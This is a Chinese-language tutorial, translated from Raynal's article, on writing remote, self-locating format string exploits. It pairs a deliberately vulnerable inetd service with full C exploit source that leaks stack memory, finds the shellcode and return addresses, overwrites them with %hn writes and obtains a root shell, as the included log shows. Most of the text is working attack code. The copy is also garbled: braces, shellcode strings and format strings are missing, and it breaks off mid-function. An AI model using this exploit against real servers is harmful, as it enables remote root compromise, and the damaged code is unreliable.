【分析】如何写远程自动精确定位的format string exploit

来源:互联网 发布:大数据专业哪些大学有 编辑:程序博客网 时间:2024/06/10 15:19

如何写远程自动精确定位的format string exploit

文章提交:alert7 (sztcww_at_sina.com)

如何写远程自动精确定位的format string exploit

原作: <<Howto remotely and automatically exploit a format bug >>
      by Fr閐閞ic Raynal <pappy@miscmag.com>
翻译整理: alert7 < alert7@xfocus.org >
主页: http://www.xfocus.org/  http://www.whitecell.org/

测试环境 both redhat linux 6.2 and 7.2默认安装

★★★ 前言

佛曰:我不入地狱谁入地狱    :)
如果你在写format string exploit的时候是依照该文章的模板写的话,

Please email to: < alert7@xfocus.org >

format string bug已经被大家熟悉了,但写一个这样的exploit或者就有点难度了,
特别是写一个远程自动精确定位的format string exploit.当然,有些format string
bug是不能写出远程自动精确定位的exploit的,比如说vul出现在syslog(LOG_ERR, buf),
下面我们就step by step来展现下这种远程自动精确定位的format string exploit技术。

★★★ --[  1. Context : the vulnerable server  ]--

该服务程序代码放在appendix 1.

安装fmtd server, 配置如下,我们使用12345 port

# /etc/inetd.conf
12345  stream  tcp  nowait  root  /home/alert7/format/fmtd

Or with xinetd:

# /etc/xinetd.conf

service fmtd
  type        = UNLISTED
  user        = raynal
  group       = users
  socket_type = stream
  protocol    = tcp
  wait        = no
  server      = /tmp/fmtd
  port        = 12345

我的实验环境是默认redhat 6.2,所以选用的是第一种。

[root@redhat]# netstat -nlp|grep 12345
(Not all processes could be identified, non-owned process info
will not be shown, you would have to be root to see it all.)
tcp        0      0 *               LISTEN      4932/inetd

[alert7@redhat]$ telnet 0 12345
Connected to 0.
Escape character is '^]'.
login: alert7
password: 1
helo world
helo world
telnet> quit
Connection closed.

[root@redhat]# tail -5 /var/log/messages
Mar  3 22:03:14 redhat fmtd[4948]: login -> read login [alert7^M ] (8) bytes
Mar  3 22:03:15 redhat fmtd[4948]: passwd -> read passwd [bffff820] (3) bytes
Mar  3 22:03:15 redhat fmtd[4948]: vul() -> tmp = 0xbffff418 buf = 0xbffff018
Mar  3 22:03:23 redhat fmtd[4948]: vul() -> error while reading input buf [] (0)
Mar  3 22:03:23 redhat inetd[4932]: pid 4948: exit status 255

假如我们使用format string,try again

[alert7@redhat]$ telnet 0 12345
Connected to 0.
Escape character is '^]'.
login: alert7
password: 1
%x %x %x %x
d 25207825 78252078 d782520

字符串"%x %x %x %x"将被做为format string,所以我们就看到了d 25207825 78252078 d782520,
显然,该server就存在一个format string vuln.

<off topic>
    In fact, all programs acting like that are not vulnerable to a
    format bug:

          int main( int argc, char ** argv )
            char buf[8];
            sprintf( buf, argv[1] );
    Using %hn to exploit this leads to an overflow: the formatted
    string is getting greater and greater, but since no control is
    performed on its length, an overflow occurs.
    而我认为这样的程序还是可以利用format string bug to exploit it.
    唯一担心的是formatted string太大,会碰到堆栈底(0xc0000000)而使程序终止,
</off topic>

  snprintf(tmp, sizeof(tmp)-1, buf);

因为buffer <buf> 是用户可以直接输入控制的,所以利用它我们可以控制服务器,获取

★★★  --[ 2. Requested parameters ]--

就象local format bug一样,以下这些参数需要获得:

    * the offset to reach the beginning of the buffer ;
    * the address of a shellcode placed somewhere is the server's memory ;
    * the address of the vulnerable buffer ;
      vuln buffer的地址,也就是input buffer format string的地址
    * a return address.



    * sd : the socket between client (exploit) and the vulnerable server ;
           client和vuln server的一个socket
    * buf : a buffer to read/write some data ;
    * read_at : an address in the server's stack ;
    * fmt : format string sent to the server.
           发送到server的format string

★★   --[  2.1 猜测offset  ]--

该offset在该类型的exploit中总是需要的,它的获取跟local exploit一样:

[alert7@redhat]$ telnet 0 12345
Connected to 0.
Escape character is '^]'.
login: alert7
password: 1

它发string "AAAA%<val>$x"到服务器,假如offset是 <val>,服务器将会回答"AAAA41414141"

[alert7@redhat]$ telnet 0 12345
Connected to 0.
Escape character is '^]'.
login: alert7
password: 1


在本文演示程序中,aligned = 0,offset = 2

| printf's 返回时ebp | printf's 返回时eip | buf地址 |   x   |  x   | buf
这里,aligned 就是等于4- (buf-buf_ptr-4)%4
     if  (aligned ==4) aligned =0;
offset = (buf-buf_ptr-4)/4
其实aligned,offset 大部分时候可以用手动计算就可以得到

  #define MAXOFFSET 255

  for (i = 1; i<MAX_OFFSET && offset == -1; i++) {

    snprintf(fmt, sizeof(fmt), "AAAA%%%d$x", i);
    write(sock, fmt, strlen(fmt));
    memset(buf, 0, sizeof(buf));
    read(sock, buf, sizeof(buf))
    if (!strcmp(buf, "AAAA41414141"))
      offset = i;

★★  --[  2.2 Guessing the address of the shellcode in the stack  ]--

vuln buffer中或者其他地方。比如密码中(PASS)---一些ftp server对anonymous
的passwd没有多做检查。我们的server就是这样工作的 。

★   -- --[  Making a format bug a debugger  ]-- --

我们的目标是找到shellcode在服务器内存中地址。所以我们将使用remote debugger

使用format string "%s", 我们将send连续的"%s"到服务器,exploit能dump出



   1. get_addr_as_char(u_int addr, char *buf)函数把add转化为char:
       *(u_int*)buf = addr;

   2. 4个字节后包含了format string

然后format string被送到远程的服务器上:

  get_addr_as_char(read_at, fmt);
  snprintf(fmt+4, sizeof(fmt)-4, "%%%d$s", offset);
  write(sd, fmt, strlen(fmt));

就在<addr + 读出数据的多少 >的地址读下一段string。

为了构造out buffer, sprintf() 从<in> string开始分析.
前面4个字节是要读的地址:他们简单的被拷贝到output buffer中.
然后是format string.因此,我们必须移4个字节:

  while( (len = read(sd, buf, sizeof(buf))) > 0) {
    [ ... ]
    read_at += (len-4+1);
    [ ... ]

★    -- --[  我们要寻找什么 ?  ]-- --



  while( (len = read(sd, buf, sizeof(buf))) > 0) {
    [ ... ]
    read_at += len;
    if (len == sizeof(buf))
    [ ... ]

注意:这种情况还没有测试...所以不保证它能正常工作 ;-/

★    -- --[  在远程进程中查找shellcode的精确地址  ]-- --

在buf中匹配Pattern :

    ptr = strstr(buf, pattern);

    addr_shellcode = read_at + (ptr-buf);


        addr_shellcode = read_at + (ptr-buf) - 4;

        addr_shellcode = read_at + (ptr-(buf + 4) );

★   -- --[  shellcode : a summary  ]-- --


  while( (len = read(sd, buf, sizeof(buf))) > 0) {
    if ((ptr = strstr(buf, shellcode))) {
      addr_shellcode = read_at + (ptr-buf) - 4;
    read_at += (len-4+1);
    if (len == sizeof(buf)) {
    memset (buf, 0x0, sizeof (buf));
    get_addr_as_char(read_at, fmt);
    write(sd, fmt, strlen(fmt));

★★  --[  2.3 猜测返回地址  ]--



   1. 找到input buffer的地址
   2. 找出属于vuln buffer函数的返回地址

为什么我们需要查找buffer的地址呢?在堆栈中查找(saved ebp, saved eip)pair
调用的(saved ebp, saved eip)pair,甚至还包含着在进程中不使用的这样的pair.

因此,第一步,我们来猜测vuln buffer的地址。在该地址之上的地址中的pairs
(saved ebp, saved eip)才是可用的。

★   -- --[  猜测input buffer地址  ]-- --

input buffer在远程进程内存中是容易鉴别的:它是我们输入数据的一个mirror。
server fmtd不做任何修改的拷贝它们。(假如在服务器回答之前对input buffer

所以,我们很容易的就能得到一份format string拷贝的地址:

  while((len = read(sd, buf, sizeof(buf))) > 0) {
    if ((ptr = strstr(buf, fmt))) {
      addr_buffer = read_at + (ptr-buf) - 4;
    read_at += (len-4+1);
    memset (buf, 0x0, sizeof (buf));
    get_addr_as_char(read_at, fmt);
    write(sd, fmt, strlen(fmt));

★    -- --[  猜测返回地址  ]-- --

大部分linux的stack top在0xc0000000.但不是全部:Caldera 的stack top为
0x80000000 (BTW, 谁能解释下为什么?).还有一些打了安全内核补丁的stack top也
不一定为0xc0000000。那些返回地址的存放地位置大概在0xbfffXXXX,这里 <XX>是不


           Top of the stack

由于i386上是小端字节序,这就等于查找下面字符序列0xff 0xbf XX XX 0x04 0x08.

    i = 4;
    while (i<len-5 && addr_ret == -1) {
      if (buf[i] == (char)0xff && buf[i+1] == (char)0xbf &&
      buf[i+4] == (char)0x04 && buf[i+5] == (char)0x08) {
    addr_ret = read_at + i - 2 + 4 - 4;
    fprintf (stderr, "[ret addr is: 0x%x (%d) ]/n", addr_ret, len);
    if (addr_ret != -1) break;


    * read_at : the address we just read ;
    * +i : the offset in the string we are looking for the pattern (we
      can't use strstr() since our pattern has wildcards - undefined
      bytes XX) ;
    * -2 : the first bytes we discover in the stack are ff bf, but
      he full word (i.e. saved %ebp) is written on 4 bytes. The -2
      is for the 2 "least bytes" placed at the beginning of the word XX
      XX ff bf ;
    * +4 : this modification is due to the return address which is 4
      bytes above the saved %ebp ;
    * -4 : as you should be used to now, the first 4 bytes which are a
      copy of the read address.

★★★--[  3. Exploitation  ]--

我们必须在vuln 函数的返回地址(addr_ret)写上shellcode的地址(addr_shellcode).
fmtbuilder函数是从[5]中栽出来的,并且构造format string发送到server:

      build_hn(buf, addr_ret, addr_shellcode, offset, 0);
      write(sd, buf, strlen(buf));

一旦在远程堆栈中替换完成,我们就只等vul()返回了。然后我们就send "quit"命令使

      strcpy(buf, "quit");
      write(sd, buf, strlen(buf));

最后,函数interact() 允许我们获得一个shell.

[alert7@redhat]$ ./expl-fmtd  -a 0xbfffed01
Using IP
Connected to
[buffer addr is: 0xbffff018 (12) ]
buf = (12)
18 f0 ff bf 18 f0 ff bf 25 32 24 73

[shell addr is: 0xbffff820 (57) ]
buf = (57)
18 f8 ff bf 48 fc ff bf 50 88 04 08 eb 1f 5e 89 76 08 31 c0 88
46 07 89 46 0c b0 0b 89 f3 8d 4e 08 8d 56 0c cd 80 31 db 89
d8 40 cd 80 e8 dc ff ff ff 2f 62 69 6e 2f 73 68
[ret addr is: 0xbffff81c (57) ]
Building format string ...
Sending the quit ...
bye bye ...
Linux redhat 2.2.14-5.0 #1 Tue Mar 7 21:07:39 EST 2000 i686 unknown
uid=0(root) gid=0(root) groups=0(root)

★★★--[  4. 小节  ]--

fmtbuilmder库也提供了一些必要的工具 (参看参考)。


该解决方法不好的地方就是返回地址在input buffer之下。返回地址使用的是vul的返回地址。

还有什么--见Appendix 3

★--[  Greetings  ]--

Denis Ducamp and Renaud Deraison for their comments/fixes.
感谢Denis Ducamp和Renaud Deraison


--[  Appendix 1 : the server side fmtd  ]--

#include <stdio.h>
#include <stdlib.h>
#include <netinet/in.h>
#include <unistd.h>
#include <stdarg.h>
#include <syslog.h>

void respond(char *fmt,...);

int vul(void)
  char tmp[1024];
  char buf[1024];
  int len = 0;

  syslog(LOG_ERR, "vul() -> tmp = 0x%x buf = 0x%x/n", tmp, buf);

  while(1) {

    memset(buf, 0, sizeof(buf));
    memset(tmp, 0, sizeof(tmp));
    if ( (len = read(0, buf, sizeof(buf))) <= 0 ) {
      syslog(LOG_ERR, "vul() -> error while reading input buf [%s] (%d)",
         buf, len);
    } /*
    syslog(LOG_INFO, "vul() -> read %d bytes", len);
    if (!strncmp(buf, "quit", 4)) {
      respond("bye bye .../n");
      return 0;
    snprintf(tmp, sizeof(tmp)-1, buf);
    respond("%s", tmp);


void respond(char *fmt,...)
  va_list va;
  char buf[1024];
  int len = 0;

  len = write(STDOUT_FILENO,buf,strlen(buf));
  /* syslog(LOG_INFO, "respond() -> write %d bytes", len); */

int main()
  struct sockaddr_in sin;
  int i,len = sizeof(struct sockaddr_in);
  char login[16];
  char passwd[1024];
  openlog("fmtd", LOG_NDELAY | LOG_PID, LOG_LOCAL0);

  /* get login */
  memset(login, 0, sizeof(login));
  respond("login: ");
  if ( (len = read(0, login, sizeof(login))) <= 0 ) {
    syslog(LOG_ERR, "login -> error while reading login [%s] (%d)",
       login, len);
  } else
    syslog(LOG_INFO, "login -> read login [%s] (%d) bytes", login, len);

  /* get passwd */
  memset(passwd, 0, sizeof(passwd));
  respond("password: ");
  if ( (len = read(0, passwd, sizeof(passwd))) <= 0 ) {
    syslog(LOG_ERR, "passwd -> error while reading passwd [%s] (%d)",
       passwd, len);
  } else
    syslog(LOG_INFO, "passwd -> read passwd [%x] (%d) bytes", passwd, len);

  /* let's run ... */
  return 0;


--[  Appendix 2 : the exploit side expl-fmtd  ]--

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <netdb.h>
#include <unistd.h>
#include <getopt.h>

char verbose = 0, debug = 0;

#define OCT( b0, b1, b2, b3, addr, str ) { /
        b0 = (addr >> 24) & 0xff; /
            b1 = (addr >> 16) & 0xff; /
            b2 = (addr >>  8) & 0xff; /
            b3 = (addr      ) & 0xff; /
                if ( b0 * b1 * b2 * b3 == 0 ) { /
                    printf( "/n%s contains a NUL byte. Leaving.../n", str ); /
                      exit( EXIT_FAILURE ); /
                } /
#define MAX_FMT_LENGTH     128
#define ADD        0x100    
#define FOUR            sizeof( size_t ) * 4
#define TWO             sizeof( size_t ) * 2
#define BANNER "uname -a ; id"
#define MAX_OFFSET 255

int interact(int sock)
  fd_set fds;
  ssize_t ssize;
  char buffer[1024];

  write(sock, BANNER"/n", sizeof(BANNER));
  while (1) {
    FD_SET(sock, &fds);
    select(sock + 1, &fds, NULL, NULL, NULL);

    if (FD_ISSET(STDIN_FILENO, &fds)) {
      ssize = read(STDIN_FILENO, buffer, sizeof(buffer));
      if (ssize < 0) {
      if (ssize == 0) {
      write(sock, buffer, ssize);

    if (FD_ISSET(sock, &fds)) {
      ssize = read(sock, buffer, sizeof(buffer));
      if (ssize < 0) {
      if (ssize == 0) {
      write(STDOUT_FILENO, buffer, ssize);

u_long resolve(char *host)
  struct hostent *he;
  u_long ret;

  if(!(he = gethostbyname(host)))

  memcpy(&ret, he->h_addr, sizeof(he->h_addr));
  return ret;
build_hn(char * buf, unsigned int locaddr, unsigned int retaddr, unsigned int offset, unsigned int base,int alinged)
  unsigned char b0, b1, b2, b3;
  unsigned int high, low;
  int start = ((base / (ADD * ADD)) + 1) * ADD * ADD;
  int sz;
  int i;

  /* <locaddr> : where to overwrite */
  OCT(b0, b1, b2, b3, locaddr, "[ locaddr ]");
  sz = snprintf(buf, TWO + 1,     /* 8 char to have the 2 addresses */
             "%c%c%c%c"       /* + 1 for the ending /0 */
             b3, b2, b1, b0,
             b3 + 2, b2, b1, b0);
  /* where is our shellcode ? */
  OCT(b0, b1, b2, b3, retaddr, "[ retaddr ]");
  high = (retaddr & 0xffff0000) >> 16;
  low = retaddr & 0x0000ffff;      
  for (i=0;i<alinged;i++)

  return snprintf(buf + sz+alinged, MAX_FMT_LENGTH,
           low - TWO + start - base,
           high - low + start,
           offset + 1);

void get_addr_as_char(u_int addr, char *buf) {

  *(u_int*)buf = addr;
  if (!buf[0]) buf[0]++;
  if (!buf[1]) buf[1]++;
  if (!buf[2]) buf[2]++;
  if (!buf[3]) buf[3]++;

int get_offset(int sock,int * alinged) {

  int i, j,offset = -1, len;
  char fmt[128], buf[128];
  char tmp1[128],tmp2[128];

  for (j =0;j<4;j++)
  if (j == 0)
  if (j == 1)
  if (j == 2)
  if (j == 3)

    for (i = 1; i<MAX_OFFSET && offset == -1; i++) {

    snprintf(fmt, sizeof(fmt), tmp1, i);
    write(sock, fmt, strlen(fmt));
    memset(buf, 0, sizeof(buf));
    if ((len = read(sock, buf, sizeof(buf))) < 0) {
      fprintf(stderr, "Error while looking for the offset (%d)/n", len);

    if (debug)
      fprintf(stderr, "testing offset = %d fmt =  [%s] buf = [%s] len = %d/n",
          i, fmt, buf, len);

    if (!strcmp(buf, tmp2))
    offset = i;
    *alinged = j;
    goto OUT;
  }//end for i

  }//end for j
  return offset;

char *shellcode =

int main(int argc, char **argv)
  char *ip = "", *ptr;
  struct sockaddr_in sck;
  u_int read_at, addr_stack = (u_int)0xbfffe0001; /* default bottom */
  u_int addr_shellcode = -1, addr_buffer = -1, addr_ret = -1;
  char buf[1024], fmt[128], c;
  int port = 12345, offset = -1;
  int sd, len, i;
  int aligned;

  while ((c = getopt(argc, argv, "dvi:p:a:o:")) != -1) {
    switch (c) {
      case 'i':
    ip = optarg;
      case 'p':
    port = atoi(optarg);

      case 'a':
    addr_stack = strtoul(optarg, NULL, 16);
      case 'o':
    offset = atoi(optarg);

      case 'v':
    verbose = 1;

      case 'd':
    debug = 1;

    fprintf(stderr, "Unknwon option %c (%d)/n", c, c);
    exit (EXIT_FAILURE);

  /* init the sockaddr_in */
  fprintf(stderr, "Using IP %s/n", ip);
  sck.sin_family = PF_INET;
  sck.sin_addr.s_addr = resolve(ip);
  sck.sin_port = htons (port);

  /* open the socket */
  if (!(sd = socket (PF_INET, SOCK_STREAM, 0))) {
    perror ("socket()");
    exit (EXIT_FAILURE);
  /* connect to the remote server */
  if (connect (sd, (struct sockaddr *) &sck, sizeof (sck)) < 0) {
    perror ("Connect() ");
    exit (EXIT_FAILURE);
  fprintf (stderr, "Connected to %s/n", ip);
  if (debug) sleep(10);

  /* send login */
  memset (buf, 0x0, sizeof(buf));
  len = read(sd, buf, sizeof(buf));
  if (strncmp(buf, "login", 5)) {
    fprintf(stderr, "Error: no login asked [%s] (%d)/n", buf, len);
  strcpy(buf, "toto");
  len = write (sd, buf, strlen(buf));
  if (verbose) fprintf(stderr, "login sent [%s] (%d)/n", buf, len);

  /* passwd: shellcode in the buffer and in the remote stack */
  len = read(sd, buf, sizeof(buf));
  if (strncmp(buf, "password", 8)) {
    fprintf(stderr, "Error: no password asked [%s] (%d)/n", buf, len);
  write (sd, shellcode, strlen(shellcode));
  if (verbose) fprintf (stderr, "passwd (shellcode) sent (%d)/n", len);

  /* find offset and aligned ,一般情况这个可以手动判断就可以了,不过程序判断
  if (offset == -1) {
    if ((offset = get_offset(sd,&aligned)) == -1) {
      fprintf(stderr, "Error: can't find offset/n");
      fprintf(stderr, "Please, use the -o arg to specify it./n");
    if (verbose) fprintf(stderr, "[Found offset = %d]/n", offset);

  /* look for the address of the shellcode in the remote stack */
  memset (fmt, 0x0, sizeof(fmt));
  read_at = addr_stack;
  get_addr_as_char(read_at, fmt);
  snprintf(fmt+4, sizeof(fmt)-4, "%%%d$s", offset);
  write(sd, fmt, strlen(fmt));

  while((len = read(sd, buf, sizeof(buf))) > 0 &&
    (addr_shellcode == -1 || addr_buffer == -1 || addr_ret == -1) ) {

    if (debug) fprintf(stderr, "Read at 0x%x (%d)/n", read_at, len);

//以下查找shellcode 在内存中的地址
    /* the shellcode */
    if ((ptr = strstr(buf, shellcode))) {
      addr_shellcode = read_at + (ptr-buf) - 4;
      fprintf (stderr, "[shell addr is: 0x%x (%d) ]/n", addr_shellcode, len);
      fprintf(stderr, "buf = (%d)/n", len);
      for (i=0; i<len; i++) {
    fprintf(stderr,"%.2x ", (int)(buf[i] & 0xff));
    if (i && i%20 == 0) fprintf(stderr, "/n");
      fprintf(stderr, "/n");

//以下查找format string地址
    /* the input buffer */
    if (addr_buffer == -1 && (ptr = strstr(buf, fmt))) {
      addr_buffer = read_at + (ptr-buf) - 4;
      /*addr_buffer就是format string的地址*/
      fprintf (stderr, "[buffer addr is: 0x%x (%d) ]/n", addr_buffer, len);
      fprintf(stderr, "buf = (%d)/n", len);
      for (i=0; i<len; i++) {
    fprintf(stderr,"%.2x ", (int)(buf[i] & 0xff));
    if (i && i%20 == 0) fprintf(stderr, "/n");
      fprintf(stderr, "/n/n");

#if 0
if (addr_buffer != -1)
    addr_ret = addr_buffer-(4*offset+4)-aligned - 4*2 - 4;

    /* return address */
    if (addr_buffer != -1) {
      i = 4;
      while (i<len-5 && addr_ret == -1) {
    if (buf[i] == (char)0xff && buf[i+1] == (char)0xbf &&
        buf[i+4] == (char)0x04 && buf[i+5] == (char)0x08) {
      addr_ret = read_at + i - 2 + 4 - 4;
      if (  (addr_ret & 0xff)* ( (addr_ret >>  8) & 0xff) *( (addr_ret >> 16) & 0xff) * ((addr_ret >> 24) & 0xff) ==0 )
          addr_ret = -1;
      else fprintf (stderr, "[ret addr is: 0x%x (%d) ]/n", addr_ret, len);

    read_at += (len-4+1);
    if (len == sizeof(buf)) {
      fprintf(stderr, "Warning: this has not been tested !!!/n");
      fprintf(stderr, "len = %d/nread_at = 0x%x", len, read_at);
    get_addr_as_char(read_at, fmt);
    write(sd, fmt, strlen(fmt));
  } //end while

  /* send the format string */
  fprintf (stderr, "Building format string .../n");
  memset(buf, 0, sizeof(buf));
  build_hn(buf, addr_ret, addr_shellcode, offset, 0,aligned);
  write(sd, buf, strlen(buf));
  read(sd, buf, sizeof(buf));

  /* call the return while quiting */
  fprintf (stderr, "Sending the quit .../n");
  strcpy(buf, "quit");
  write(sd, buf, strlen(buf));


  return 0;


--[  Appendix 3 : the exploit modify by alert7  ]--


如果input buffer够大,而又没有其他地址可输入的地方,没有象类似pass的时候
我们可以把shellcode直接放到input buffer中


  第二个就是input buffer的地址,也就是format string的地址
      format string后面,直接和format string放进了input buffer
      所以,有了format string地址,就有了shellcode地址
也就是由于使用了该技术,才使的我们的shellcode可以放在input buffer中。

象printf(buf)(format string可以在buf中找到)和sprintf(buf1,buf2)
(format string可以同时在buf1和buf2中找到)这样两大类*printf函数

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <netdb.h>
#include <unistd.h>
#include <getopt.h>

char verbose = 0, debug = 0;

#define OCT( b0, b1, b2, b3, addr, str ) { /
        b0 = (addr >> 24) & 0xff; /
            b1 = (addr >> 16) & 0xff; /
            b2 = (addr >>  8) & 0xff; /
            b3 = (addr      ) & 0xff; /
                if ( b0 * b1 * b2 * b3 == 0 ) { /
                    printf( "/n%s contains a NUL byte. Leaving.../n", str ); /
                      exit( EXIT_FAILURE ); /
                } /
#define MAX_FMT_LENGTH     128
#define ADD        0x100    
#define FOUR            sizeof( size_t ) * 4
#define TWO             sizeof( size_t ) * 2
#define BANNER "uname -a ; id"
#define MAX_OFFSET 255

char *shellcode =

int interact(int sock)
  fd_set fds;
  ssize_t ssize;
  char buffer[1024];

  write(sock, BANNER"/n", sizeof(BANNER));
  while (1) {
    FD_SET(sock, &fds);
    select(sock + 1, &fds, NULL, NULL, NULL);

    if (FD_ISSET(STDIN_FILENO, &fds)) {
      ssize = read(STDIN_FILENO, buffer, sizeof(buffer));
      if (ssize < 0) {
      if (ssize == 0) {
      write(sock, buffer, ssize);

    if (FD_ISSET(sock, &fds)) {
      ssize = read(sock, buffer, sizeof(buffer));
      if (ssize < 0) {
      if (ssize == 0) {
      write(STDOUT_FILENO, buffer, ssize);

u_long resolve(char *host)
  struct hostent *he;
  u_long ret;

  if(!(he = gethostbyname(host)))

  memcpy(&ret, he->h_addr, sizeof(he->h_addr));
  return ret;

build_hn(char * buf, unsigned int locaddr, unsigned int retaddr, unsigned int offset, unsigned int base,int alinged)
  unsigned char b0, b1, b2, b3;
  unsigned int high, low;
  int start = ((base / (ADD * ADD)) + 1) * ADD * ADD;
  int sz;
  int i,j,count=0;


for (i=0;i<alinged;i++)

  /* <locaddr> : where to overwrite */
  OCT(b0, b1, b2, b3, locaddr, "[ locaddr ]");
  sz = snprintf(buf+alinged, TWO + 1,     /* 8 char to have the 2 addresses */
             "%c%c%c%c"       /* + 1 for the ending /0 */
             b3, b2, b1, b0,
             b3 + 2, b2, b1, b0);
  /* where is our shellcode ? */
  OCT(b0, b1, b2, b3, retaddr, "[ retaddr ]");
  high = (retaddr & 0xffff0000) >> 16;
  low = retaddr & 0x0000ffff;      
  printf("low %d;TWO %d;start %d;base %d;offset %d;high %d/n/n",low,TWO,start,base,offset,high);

  i = snprintf(buf + sz+alinged, MAX_FMT_LENGTH,
           low - TWO + start - base,
           high - low + start,
           offset + 1);
for (j=0;j<strlen(buf);j++)
    if (buf[j] == '%' )
    fprintf(stderr,"%.2x ", (int)(buf[j] & 0xff));
    if (j && j%20 == 0) fprintf(stderr, "/n");
fprintf(stderr, "/n/n");
if (count > 4)
    printf("too many '%%' in input buffer/nmay be failed/n/n");
return i;

void get_addr_as_char(u_int addr, char *buf) {

  *(u_int*)buf = addr;
  if (!buf[0]) buf[0]++;
  if (!buf[1]) buf[1]++;
  if (!buf[2]) buf[2]++;
  if (!buf[3]) buf[3]++;

int get_offset(int sock,int * alinged) {

  int i, j,offset = -1, len;
  char fmt[128], buf[128];
  char tmp1[128],tmp2[128];

  for (j =0;j<4;j++)
  if (j == 0)
  if (j == 1)
  if (j == 2)
  if (j == 3)

    for (i = 1; i<MAX_OFFSET && offset == -1; i++) {

    snprintf(fmt, sizeof(fmt), tmp1, i);
    write(sock, fmt, strlen(fmt));
    memset(buf, 0, sizeof(buf));
    if ((len = read(sock, buf, sizeof(buf))) < 0) {
      fprintf(stderr, "Error while looking for the offset (%d)/n", len);

    if (debug)
      fprintf(stderr, "testing offset = %d fmt =  [%s] buf = [%s] len = %d/n",
          i, fmt, buf, len);

    if (!strcmp(buf, tmp2))
    offset = i;
    *alinged = j;
    goto OUT;
  }//end for i

  }//end for j
  return offset;

int main(int argc, char **argv)
  char *ip = "", *ptr;
  struct sockaddr_in sck;
  u_int read_at, addr_stack = (u_int)0xbfffe001; /* default bottom */
  u_int addr_shellcode = -1, addr_buffer = -1, addr_ret = -1;
  char buf[1024], fmt[128], c;
  int port = 12345, offset = -1;
  int sd, len, i;
  int aligned;
  int formatstring_counts = 0;
  u_int formatstring1=0,formatstring2=0;
  int use_format = 0;
  int like_printf = 0;

  while ((c = getopt(argc, argv, "dvi:p:a:o:")) != -1) {
    switch (c) {
      case 'i':
    ip = optarg;
      case 'p':
    port = atoi(optarg);

      case 'a':
    addr_stack = strtoul(optarg, NULL, 16);
      case 'o':
    offset = atoi(optarg);

      case 'v':
    verbose = 1;

      case 'd':
    debug = 1;

    fprintf(stderr, "Unknwon option %c (%d)/n", c, c);
    exit (EXIT_FAILURE);

  /* init the sockaddr_in */
  fprintf(stderr, "Using IP %s/n", ip);
  sck.sin_family = PF_INET;
  sck.sin_addr.s_addr = resolve(ip);
  sck.sin_port = htons (port);

  /* open the socket */
  if (!(sd = socket (PF_INET, SOCK_STREAM, 0))) {
    perror ("socket()");
    exit (EXIT_FAILURE);
  /* connect to the remote server */
  if (connect (sd, (struct sockaddr *) &sck, sizeof (sck)) < 0) {
    perror ("Connect() ");
    exit (EXIT_FAILURE);
  fprintf (stderr, "Connected to %s/n", ip);
  if (debug) sleep(10);

  /* send login */
  memset (buf, 0x0, sizeof(buf));
  len = read(sd, buf, sizeof(buf));
  if (strncmp(buf, "login", 5)) {
    fprintf(stderr, "Error: no login asked [%s] (%d)/n", buf, len);
  strcpy(buf, "alert7");
  len = write (sd, buf, strlen(buf));
  if (verbose) fprintf(stderr, "login sent [%s] (%d)/n", buf, len);

  /* passwd: shellcode in the buffer and in the remote stack */
  len = read(sd, buf, sizeof(buf));
  if (strncmp(buf, "password", 8)) {
    fprintf(stderr, "Error: no password asked [%s] (%d)/n", buf, len);
  write (sd, "hi", 2);
  if (verbose) fprintf (stderr, "passwd (hi) sent (%d)/n", len);

  /* find offset and aligned ,一般情况这个可以手动判断就可以了,不过程序判断
  if (offset == -1) {
    if ((offset = get_offset(sd,&aligned)) == -1) {
       fprintf(stderr, "Error: can't find offset/n");
       fprintf(stderr, "Please, use the -o arg to specify it./n");
    fprintf(stderr, "/n[Found offset = %d aligned %d ]/n/n", offset,aligned);

  /* look for the address of the shellcode in the remote stack */
  memset (fmt, 0x0, sizeof(fmt));
  read_at = addr_stack;
  get_addr_as_char(read_at, fmt);
  snprintf(fmt+4, sizeof(fmt)-4, "%%%d$s", offset);
  write(sd, fmt, strlen(fmt));

  while((len = read(sd, buf, sizeof(buf))) >= 0 &&
    (addr_shellcode == -1 || addr_buffer == -1 || addr_ret == -1) ) {
    if (len ==0)
                printf("remote machine close connection!!/naddr_stack too small,You can use -a addr adjust it/n ");

    if (debug) fprintf(stderr, "Read at 0x%x (%d)/n", read_at, len);

//以下查找format string地址
    /* the input buffer */
    if (addr_buffer == -1 && (ptr = strstr(buf, fmt))) {
       addr_buffer = read_at + (ptr-buf) - 4;
       /*addr_buffer就是format string的地址*/
       fprintf (stderr, "[buffer addr is: 0x%x (%d) ]/n", addr_buffer, len);
       fprintf(stderr, "buf = (%d)/n", len);
       for (i=0; i<len; i++) {
        fprintf(stderr,"%.2x ", (int)(buf[i] & 0xff));
        if (i && i%20 == 0) fprintf(stderr, "/n");
       fprintf(stderr, "/n/n");
       if (formatstring_counts==1)
         formatstring1 = addr_buffer;
         addr_buffer =-1;
      if ( read_at  > 0xbfffffe0 )
        formatstring1 = addr_buffer;
        like_printf = 1;
        read_at = formatstring1 -4096 ;//只找到一个format string,表示类似printf(buf);
      if (formatstring_counts==2)
         formatstring2 = addr_buffer;
         read_at = (formatstring1>formatstring2)?(formatstring2 -4096):(formatstring1 -4096);

/*查找snprintf(tmp, sizeof(tmp)-1, buf)的活动记录
* formatstring1和2是tmp,buf的地址
* xx xx ff bf xx xx 04 08 formatstring1 xx xx xx xx  formatstring2
* 或者
* xx xx ff bf xx xx 04 08 formatstring2 xx xx xx xx  formatstring1
    if (addr_buffer != -1) {
    i = 4;
    while (i<len-5 && addr_ret == -1) {
        if (!like_printf)
        {    //like sprintf have two format string
            if (buf[i] == (char)0xff && buf[i+1] == (char)0xbf &&
                    buf[i+4] == (char)0x04 && buf[i+5] == (char)0x08 &&
                       ( ( *(int*) &buf[i+6] ==formatstring1 ) || ( *(int*) &buf[i+6] ==formatstring2 ) )
            ) {
                if ( *(int*) &buf[i+6] ==formatstring1 )
                        use_format = 2;
                    use_format = 1;

                addr_ret = read_at + i - 2 + 4 - 4;
                printf("addr_ret %p/n",addr_ret);
            if ( (addr_ret & 0xff)* ( (addr_ret >>  8) & 0xff) *( (addr_ret >> 16) & 0xff) * ((addr_ret >> 24) & 0xff) ==0 )
                addr_ret = -1;
                    else fprintf (stderr, "[ret addr is: 0x%x (%d) ]/n", addr_ret, len);
            }//end if
        }//end if like_printf
        else {
        //like printf have only format string
            if (buf[i] == (char)0xff && buf[i+1] == (char)0xbf &&
